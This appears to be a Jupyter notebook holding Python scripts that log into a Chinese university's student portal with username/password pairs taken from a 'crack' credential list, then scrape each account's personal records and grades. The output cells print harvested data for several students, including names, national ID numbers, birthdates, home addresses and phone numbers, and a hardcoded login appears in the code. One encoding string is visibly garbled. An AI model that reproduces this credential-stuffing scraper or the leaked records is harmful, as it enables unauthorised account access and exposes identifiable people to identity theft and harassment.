In [11]:
import re
import requests
from bs4 import BeautifulSoup
from lxml import etree
from requests import exceptions


class GetStart:
    student_id = "201702420"
    password = "98121"
    session = requests.Session()
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) \
           Chrome/71.0.3578.98 Safari/537.36"}

    def get_sign(self):
        index = self.session.get('http://jiaowu.sicau.edu.cn/web/web/web/index.asp', timeout=5)
        index.encoding = 'gb2312'
        return etree.HTML(index.text).xpath("//input[@name='sign']/@value")

    def get_soup(self, url):
        data = {'user': self.student_id, 'pwd': self.password, 'lb': 'S', 'submit': '', 'sign': self.get_sign()}
        try:
            post_url = 'http://jiaowu.sicau.edu.cn/jiaoshi/bangong/check.asp'
            self.session.post(post_url, data=data, timeout=5, headers=self.headers)
        except exceptions.Timeout as e:
            print('请求超时：' + str(e))
        except exceptions.HTTPError as e:
            print('http请求错误:' + str(e))
        else:
            data = self.session.get(url, timeout=5)
            data.encoding = 'gb2312'
            return BeautifulSoup(data.text, features='lxml')

    def cet(self):
        url = "http://jiaowu.sicau.edu.cn/xuesheng/kao/bao/yycj.asp"
        data1 = {'user': self.student_id, 'pwd': self.password, 'lb': 'S', 'submit': '', 'sign': self.get_sign()}
        post_url = 'http://jiaowu.sicau.edu.cn/jiaoshi/bangong/check.asp'
        self.session.post(post_url, data=data1, timeout=5, headers=self.headers)
        data = {
            "dj": "89321196860502778935097686683832"
        }
        data = self.session.post(url, data=data, timeout=5)
        data.encoding = 'gb2312'
        soup = BeautifulSoup(data.text, features='html5lib')
        r = soup.findAll("td", {"width": "50"})
        return r[6].text

    def cet6(self):
        url = "http://jiaowu.sicau.edu.cn/xuesheng/kao/bao/yycj.asp"
        data1 = {'user': self.student_id, 'pwd': self.password, 'lb': 'S', 'submit': '', 'sign': self.get_sign()}
        post_url = 'http://jiaowu.sicau.edu.cn/jiaoshi/bangong/check.asp'
        self.session.post(post_url, data=data1, timeout=5, headers=self.headers)
        data = {
            "dj": "86041597861062128606986789370776"
        }
        data = self.session.post(url, data=data, timeout=5)
        data.encoding = 'gb289321196860502778935097686683832312'
        soup = BeautifulSoup(data.text, features='html5lib')
        r = soup.findAll("td", {"width": "50"})
        return r[6].text


class Inquire(GetStart):
    def grade(self):
        # 必修课加权平均成绩及专业排名
        url1 = "http://jiaowu.sicau.edu.cn/xuesheng/chengji/chengji/zytongbf.asp"
        soup = self.get_soup(url1)
#         soup = soup.prettify()
        result = soup.find_all("td", {"align":"left"})
        # 所有课程加权平均成绩及专业排名
        url2 = "http://jiaowu.sicau.edu.cn/xuesheng/chengji/chengji/zytongall.asp"
        soup2 = self.get_soup(url2)
        result2 = soup2.find_all("td", {"align":"left"})
        grade = {
            "bxjq":result[-2].text,
            "bxjq_pm":result[-1].text,
            "sykcjq":result2[-2].text,
            "sykcjq_pm":result2[-1].text
        }
        return grade

    def get_personal_info(self):
        url = "http://jiaowu.sicau.edu.cn/xuesheng/dangan/banji/bjiben.asp"
        soup = self.get_soup(url)
        soup_find = soup.find_all("a", {"class": "g_body"})
        personal_info = {
            "exam_id": soup_find[0].text,
            "student_id": soup_find[1].text,
            "name": soup_find[2].text,
            "gender": soup_find[3].text,
            "department": soup_find[4].text,
            "faculty": soup_find[5].text,
            "learn_year": soup_find[6].text,
            "level": soup_find[7].text,
            "grade": soup_find[8].text,
            "init_class": soup_find[9].text,
            "new_faculty": soup_find[10].text,
            "new_class": soup_find[11].text,
            "status": soup_find[12].text,
            "entry_date": soup_find[13].text,
            "id_card": soup_find[14].text,
            "birthday": soup_find[15].text,
            "nationality": soup_find[16].text,
            "political_status": soup_find[17].text,
            "address": soup_find[18].text,
            "personal_phone": soup_find[20].text,
            "parent_phone": soup_find[21].text,
            "skills": soup_find[22].text,
        }
        return personal_info
    
    def all(self):
        personal_info = self.get_personal_info()
        grade = self.grade()
        s = ""
        for i in personal_info:
            s += personal_info[i]
            s += "|"
        for j in grade:
            s += grade[j]
            s += "|"
        return s

if __name__ == '__main__':
    info = Inquire()
    def readtxt(file_path):
        l = []
        with open(file_path) as f:
            for i in f.readlines():
                l.append(i.strip())
        return l
    log = open("./test", "a+")
    user_pwd = readtxt("../../crack/data/up.txt")
    for i in user_pwd[:10]:
        a = i.split()
        info.student_id = a[0]
        info.password = a[1]
        try:
            r = info.all()
            print(r, file=log)
            print(r)
        except:
            print(info.student_id, "密码错误", file=log)
            print(info.student_id, "密码错误")            

18510113162689|201802012|代瑜|女|生命科学学院|生物工程|4|本科|2018|生工201804|生物工程|生工201804|在读|2018-09-05|513331200003110046|2000-3-11|汉族|共青团员|四川省成都市双流区东升镇藏卫路北一段39号|17311303606|18048480880|无|91.47|1|91.44|1|
18510404121282|201808898|徐迅|男|商学院|会计学|4|本科|2018|会计学(本)201801|会计学|会计学(本)201801|在读|2018-09-05|510525200011163173|2000-11-16|汉族|共青团员|四川省古蔺县土城镇堰塘村九组100号||18209849526||82.91|35|83.16|35|
18510904160105|201806008|曾琼蝶|女|环境学院|环境工程|4|本科|2018|环工201804|环境工程|环工201804|在读|2018-09-05|511024200009020381|2000-9-2|汉族|共青团员|四川省内江市威远县连界镇红旗新区12幢3单元105号|18990592582|15378328866|书法|88.06|51|87.06|55|
18510699161364|201808454|陈军佐|男|建筑与城乡规划学院|工程造价|4|本科|2018|造价(本)201802|工程造价|造价(本)201802|在读|2018-09-05|513030200002092613|2000-2-9|汉族|共青团员|四川省达州市渠县涌兴镇祥和街追梦网吧|17882399803|13086322808||82.31|94|82.36|94|
18500130151327|201806090|乐玲利|女|环境学院|环境生态工程|4|本科|2018|环境生态201801|环境生态工程|环境生态201801|在读|2018-09-05|500233199909188242|1999-9-18|汉族|共青团员|重庆市忠县永丰镇太阳村七组28号|1887530159|18875308159|羽毛球，乒乓球等|86.03|49|85.9|41|
17510120160546|201709977|江万里|男|土

In [ ]:
import requests
import re
from lxml import etree
import datetime as d
from bs4 import BeautifulSoup


def student_name(student_id, pwd):
    session = requests.Session()
    t = d.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    try:
        index = session.get('http://jiaowu.sicau.edu.cn/web/web/web/index.asp', timeout=5)
        index.encoding = 'gb2312'
        seletor = etree.HTML(index.text)
        sign = seletor.xpath("//input[@name='sign']/@value")
        data = {'user': student_id, 'pwd': pwd, 'lb': 'S', 'submit': '', 'sign': sign}
        try:
            post_url = 'http://jiaowu.sicau.edu.cn/jiaoshi/bangong/check.asp'
            try:
                session.post(post_url, data=data, timeout=5)
                data = session.get('http://jiaowu.sicau.edu.cn/xuesheng/cx/zhcp/bzr_zhcj.asp', timeout=5)
            except:
                return student_id, pwd,'Connection_timed_out_2'
            data.encoding = 'gb2312'
            soup = BeautifulSoup(data.text, features='html5lib')
            nameAndId = soup.find_all('td', {"class": "g_body"})
            info = []
            for i in range(int(len(nameAndId)/9)):
                info.append(nameAndId[i*9+2].string+" "+nameAndId[i*9+3].string+" "+nameAndId[i*9+4].string+" "+nameAndId[i*9+5].string)
            return info
        except:
            return student_id, pwd, 'wrong_password', t
    except:
        return student_id, pwd,'Connection_timed_out_1', t
    

def readtxt(file_path):
    l = []
    with open(file_path) as f:
        for i in f.readlines():
            l.append(i.strip())
    return l
log = open("./log", "a+")
user_pwd = readtxt("./pwd")
for i in user_pwd:
    a = i.split()
    for j in student_name(a[0], a[1]):
        print(j, file=log)
for i in student_name(201702420,981211):
    print(i)